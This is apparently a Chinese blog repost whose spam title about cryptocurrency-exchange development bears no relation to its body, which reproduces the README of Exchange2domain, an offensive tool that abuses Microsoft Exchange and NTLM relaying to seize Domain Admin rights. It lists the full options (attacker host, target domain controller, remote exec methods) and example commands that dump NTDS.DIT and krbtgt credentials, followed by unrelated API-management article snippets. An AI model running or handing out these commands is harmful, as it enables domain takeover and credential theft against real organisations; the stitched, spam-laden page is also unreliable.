国王小组:数字货币交易所开发中域名管理API调用

简介: 秒合约交易所开发详细丨秒合约交易所系统开发详细及规则丨秒合约交易所系统源码部署海外版数字货币交易所系统开发(逻辑及功能)丨多语言数字货币交易所系统开发(案例及源码)交易所开发成品丨交易所系统开发(演示版)丨交易所APP源码设计区块链交易所开发详细丨区块链交易所系统开发(开发方案)丨区块链交易所源码案例部署数字货币交易所开发详情版丨数字货币交易所系统开发(web3.0技术开发)丨数字货币交易所开发源码成品交易所APP开发功能丨交易所系统开发(成熟及案例)丨交易所系统源码平台

Exchange2domain

秒合约交易所开发详细丨秒合约交易所系统开发详细及规则丨秒合约交易所系统源码部署
海外版数字货币交易所系统开发(逻辑及功能)丨多语言数字货币交易所系统开发(案例及源码)
交易所开发成品丨交易所系统开发(演示版)丨交易所APP源码设计
区块链交易所开发详细丨区块链交易所系统开发(开发方案)丨区块链交易所源码案例部署
数字货币交易所开发详情版丨数字货币交易所系统开发(web3.0技术开发)丨数字货币交易所开发源码成品
交易所APP开发功能丨交易所系统开发(成熟及案例)丨交易所系统源码平台

privexchange的所有工具。你只需要打开网络服务器的端口,所以不需要很高的权限。

写得很好!滥用Exchange。离域名管理只有一个API调用。

要求
这些工具需要impacket。你可以用pip install impacket来安装它。

使用方法
usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]

                      [--hashes HASHES] [--no-ssl]
                      [--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
                      [-ap ATTACKER_PORT] -th TARGET_HOST
                      [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [--exchange-version EXCHANGE_VERSION]
                      [--attacker-page ATTACKER_PAGE]
                      [--just-dc-user USERNAME] [--debug]
                      HOSTNAME

Exchange your privileges for Domain Admin privs by abusing Exchange. Use me
with ntlmrelayx

positional arguments:
HOSTNAME Hostname/ip of the Exchange server

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME

                    username for authentication

-d DOMAIN, --domain DOMAIN

                    domain the user is in (FQDN or NETBIOS domain name)

-p PASSWORD, --password PASSWORD

                    Password for authentication, will prompt if not
                    specified and no NT:NTLM hashes are supplied

--hashes HASHES LM:NLTM hashes
--no-ssl Don't use HTTPS (connects on port 80)
--exchange-port EXCHANGE_PORT

                    Alternative EWS port (default: 443 or 80)

-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST

                    Attacker hostname or IP

-ap ATTACKER_PORT, --attacker-port ATTACKER_PORT

                    Port on which the relay attack runs (default: 80)

-th TARGET_HOST, --target-host TARGET_HOST

                    Hostname or IP of the DC

-exec-method [{smbexec,wmiexec,mmcexec}]

                    Remote exec method to use at target (only when using
                    -use-vss). Default: smbexec

--exchange-version EXCHANGE_VERSION

                    Exchange version of the target (default: Exchange2013,
                    choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2
                    ,Exchange2013,Exchange2013_SP1,Exchange2016)

--attacker-page ATTACKER_PAGE

                    Page to request on attacker server (default:
                    /privexchange/)

--just-dc-user USERNAME

                    Extract only NTDS.DIT data for the user specified.
                    Only available for DRSUAPI approach.

--debug Enable debug output
example:

python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
f you only want to dump krbtgt, use --just-dc-user.

example:

python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
Update
Auto backup old SD for restore.

相关文章
|
缓存 算法 API
查询域名WHOIS信息免费API接口教程
该API用于查询顶级域名的WHOIS信息,不支持国别域名和中文域名。通过POST或GET请求,需提供用户ID、KEY及待查询域名。返回信息包括域名状态、注册商、时间等详细数据。示例与文档见官网。
1310 5
|
缓存 网络协议 API
【API管理 APIM】APIM中对后端API服务的DNS域名缓存问题
【API管理 APIM】APIM中对后端API服务的DNS域名缓存问题
230 4
|
NoSQL Serverless API
Serverless 架构实现弹幕场景问题之API Gateway和OSS域名未绑定成功的问题如何解决
Serverless 架构实现弹幕场景问题之API Gateway和OSS域名未绑定成功的问题如何解决
211 0
|
SQL DataWorks NoSQL
DataWorks产品使用合集之如何配置API以使用专用域名
DataWorks作为一站式的数据开发与治理平台,提供了从数据采集、清洗、开发、调度、服务化、质量监控到安全管理的全套解决方案,帮助企业构建高效、规范、安全的大数据处理体系。以下是对DataWorks产品使用合集的概述,涵盖数据处理的各个环节。
178 1
|
监控 Cloud Native 安全
【阿里云云原生专栏】云原生下的API管理:阿里云API Gateway的应用场景与优势
【5月更文挑战第23天】阿里云API Gateway是高性能的API托管服务,适用于微服务API聚合、安全管理及流量控制。它提供统一入口、多种认证方式和流量控制策略,确保服务稳定性。具备高度可扩展性、丰富插件生态和简化API生命周期管理等特点。通过简单步骤,如创建API、配置后端服务、设置认证和发布,即可快速上手。作为云原生时代的API管理解决方案,阿里云API Gateway助力企业高效、安全地管理API,推动业务创新和数字化转型。
400 1
|
存储 自然语言处理 搜索推荐
Elasticsearch 8.10 同义词管理新篇章:引入同义词 API
Elasticsearch 8.10 同义词管理新篇章:引入同义词 API
|
前端开发 JavaScript API
React的Context API:全局状态管理的利器
【4月更文挑战第25天】React的Context API解决了深层组件间状态共享的难题,提供全局状态管理方案。通过`Provider`和`Consumer`组件,或结合`useContext` Hook,实现状态在组件树中的传递。最佳实践包括避免过度使用,分离逻辑,以及在必要时与Redux或MobX结合。Context API简化了数据传递,但需谨慎使用以保持代码清晰。
|
JSON JavaScript API
访问REST API:在Vue中消费和管理远程数据
【4月更文挑战第23天】本文探讨了在Vue应用中高效访问REST API的方法,包括选择合适的API、使用Axios或Fetch发送请求、封装API服务、处理响应和数据、错误管理及性能优化。关键点在于创建服务层封装请求,使用计算属性和方法处理数据,以及实施错误处理和性能提升策略。通过这些最佳实践,开发者能更好地管理和消费远程数据,构建出动态、响应式的Vue应用。
284 0
|
供应链 数据挖掘 API
淘宝API接口系列:数据分析丨Erp上货丨维权控价丨商品搬家丨店铺订单管理
淘宝API接口系列在多个方面为电商业务提供了强大的支持,包括数据分析、ERP上货、维权控价、商品搬家以及店铺订单管理。下面将针对这些方面逐一进行说明。
|
Linux API 网络架构
Rest API请求管理最佳实践:RestClient-cpp库的应用案例
Rest API请求管理最佳实践:RestClient-cpp库的应用案例
下一篇
开通oss服务